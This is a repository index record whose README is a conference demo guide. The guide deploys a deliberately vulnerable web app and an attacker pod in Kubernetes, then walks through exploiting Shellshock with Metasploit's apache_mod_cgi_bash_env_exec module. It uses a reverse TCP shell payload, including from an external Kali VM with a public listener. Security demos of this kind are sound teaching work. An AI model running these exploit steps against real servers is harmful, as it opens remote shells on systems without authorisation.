{"id":24938550,"url":"https://github.com/checkpointsw-community/vulnerable-containers","last_synced_at":"2026-02-11T23:39:05.769Z","repository":{"id":240259787,"uuid":"413925794","full_name":"CheckPointSW-Community/vulnerable-containers","owner":"CheckPointSW-Community","description":null,"archived":false,"fork":false,"pushed_at":"2021-10-05T18:25:30.000Z","size":20983,"stargazers_count":0,"open_issues_count":0,"forks_count":2,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-09-01T13:02:16.004Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"HTML","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/CheckPointSW-Community.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-10-05T17:57:59.000Z","updated_at":"2021-10-05T18:25:33.000Z","dependencies_parsed_at":"2024-05-17T16:55:01.583Z","dependency_job_id":null,"html_url":"https://github.com/CheckPointSW-Community/vulnerable-containers","commit_stats":null,"previous_names":["checkpointsw-community/vulnerable-containers"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/CheckPointSW-Community/vulnerable-containers","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CheckPointSW-Community%2Fvulnerable-containers","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CheckPointSW-Community%2Fvulnerable-containers/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CheckPointSW-Community%2Fvulnerable-containers/releases","manifests_url":"https://repos
.ecosyste.ms/api/v1/hosts/GitHub/repositories/CheckPointSW-Community%2Fvulnerable-containers/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/CheckPointSW-Community","download_url":"https://codeload.github.com/CheckPointSW-Community/vulnerable-containers/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CheckPointSW-Community%2Fvulnerable-containers/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29349623,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-11T20:11:40.865Z","status":"ssl_error","status_checked_at":"2026-02-11T20:10:41.637Z","response_time":97,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2025-02-02T17:58:39.934Z","updated_at":"2026-02-11T23:39:05.753Z","avatar_url":"https://github.com/CheckPointSW-Community.png","language":"HTML","funding_links":[],"categories":[],"sub_categories":[],"readme":"# CPX 2021 demo\n\u003c!-- vim-markdown-toc GFM --\u003e\n\n* [Requirements](#requirements)\n* [Installation](#installation)\n* [Demo](#demo)\n* [Cleanup](#cleanup)\n* [Attacker from external VM](#attacker-from-external-vm)\n* [Tips](#tips)\n\n\u003c!-- vim-markdown-toc --\u003e\n\n# Requirements\n\n- [Helm3](https://helm.sh/)\n- *Highly 
recommended*: [K9S](https://github.com/derailed/k9s)\n- If you want to demo using the hard way: [kubectl](https://kubernetes.io/docs/tasks/tools/install-kubectl/)\n\n# Installation\n\u003e Make sure you are using the Helm3 client\n```bash\n# Install our sushi restaurant web page\nhelm install -f cpx-sushi/values.yaml --namespace sushi --create-namespace sushi-restaurant cpx-sushi\n# Install the attacker client\nhelm install -f attacker-cpx/values.yaml --namespace attacker --create-namespace attacker-client attacker-cpx\n# Ignore the stdout printed by helm\n```\n\n# Demo\n\nRun K9S, check the namespace 'vulnerable' and verify there are 2 pods running\nthere:\n\n- metasploit-client: We will use this as the \"attacker machine\"\n- vuln-app-cpx-helm-vulnerable: We will use this as the \"victim machine\"\n\nVerify the vulnerable namespace has a LoadBalancer service which has an\nexternal-IP assigned. Write down this value as we will need it during the\nattack phase. This will allow attacking the application even from outside the\nK8S cluster.\n\nStart a shell within the metasploit container and execute:\n```bash\ncd /usr/src/metasploit-framework\n./msfconsole -r docker/msfconsole.rc -y $APP_HOME/config/database.yml\n# The metasploit framework shall start...\n```\n\nUsing the metasploit framework we will exploit the \u003ci\u003eapache_mod_cgi_bash_env_exec\u003c/i\u003e:\n```bash\nsearch shellshock\n# Locate the module with the name apache_mod_cgi_bash_env\nuse exploit/multi/http/apache_mod_cgi_bash_env_exec\n# Check available options\nshow options\n# Set RHOST to the external IP of the vuln-app-cpx-helm-vulnerable\nset rhost \u003cexternal-ip\u003e\n# You could also use the internal cluster IP since the metasploit pod has visibility of the vulnerable pod\nset rport 80\nset targeturi /cgi-bin/menu\n# Set the payload\nset payload linux/x86/shell/reverse_tcp\n# Check if target is vulnerable\ncheck\n# Exploit vulnerability\nexploit\n```\n\nAt this point you may get multiple sessions opened in background mode. List\nthem and use one of them to exploit the reverse tcp shell:\n```bash\n# List sessions\nsessions\n# Run interactive shell in session #1\nsessions -i 1\n# Start running commands\nwhoami\nls -la\n```\n\n# Cleanup\n```bash\nhelm uninstall sushi-restaurant -n sushi\nhelm uninstall attacker-client -n attacker\n```\n\n# Attacker from external VM\nIn order to set up the attacker machine from an external VM running a\ndistribution like Kali Linux, you will need to assign a public IP address to\nthis machine so that it is reachable. Additionally, the port where the\nreverse shell connection will be established needs to be allowed for input\nconnections (e.g., in AWS the security group of the EC2 instance needs to allow\ninput connections to port \u003cX\u003e).\n\nHow to run the exploit is very similar. First ssh into the Kali Linux machine:\n```bash\n# Start metasploit console\nmsfconsole\n# Follow the same steps that we already described\n# We will need to set a few extra options\nset lhost \u003cpublic-ip-of-vm\u003e\nset lport \u003cport-that-we-allow-input-connections\u003e\n# set lport 4444\ncheck\nexploit\n```\n\n# Tips\n\n- Use K9S client to demonstrate interactively how to perform the attack, it\n  will save some time if you need to run kubectl all the time\n\n*Based on original demo created [here:](https://github.com/chkp-ivanmar/cpx-2021-demo)*\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcheckpointsw-community%2Fvulnerable-containers","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcheckpointsw-community%2Fvulnerable-containers","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcheckpointsw-community%2Fvulnerable-containers/lists"}